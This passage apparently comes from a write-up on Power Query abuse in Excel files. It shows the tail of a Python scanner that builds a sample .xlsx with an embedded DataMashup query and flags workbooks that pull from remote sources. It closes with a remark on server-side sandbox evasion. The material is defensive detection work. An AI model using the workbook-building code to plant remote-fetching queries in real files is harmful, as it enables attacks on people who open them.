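    blob = struct.pack("<II", 0, len(parts)) + parts + struct.pack("<I", 0) * 3
    return base64.b64encode(blob).decode("ascii")


def build_sample_xlsx(m_code=SAMPLE_M):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/connections.xml",
                   '<connections><connection id="1" name="Query - Query1"><extLst><ext>'
                   '<x15:connection><x15:oledbPr connection="Provider=Microsoft.Mashup.OleDb.1;'
                   'Data Source=$Workbook$;Location=Query1"/></x15:connection>'
                   '</ext></extLst></connection></connections>')
        z.writestr("customXml/item1.xml",
                   '<DataMashup xmlns="http://schemas.microsoft.com/DataMashup">'
                   + build_datamashup(m_code) + "</DataMashup>")
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: pq_scan.py [file.xlsx]; with no argument the constructed sample is scanned.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
    else:
        data = build_sample_xlsx()
    found = scan_xlsx(data)
    print(found)
    print("SUSPICIOUS" if is_suspicious(found) else "clean")
```

Because the scan is static, it is not defeated by the sandbox-evasion the research describes (the remote server deciding what to serve based on who fetches it): the presence of a remote source is visible in the file regardless of what that source later returns.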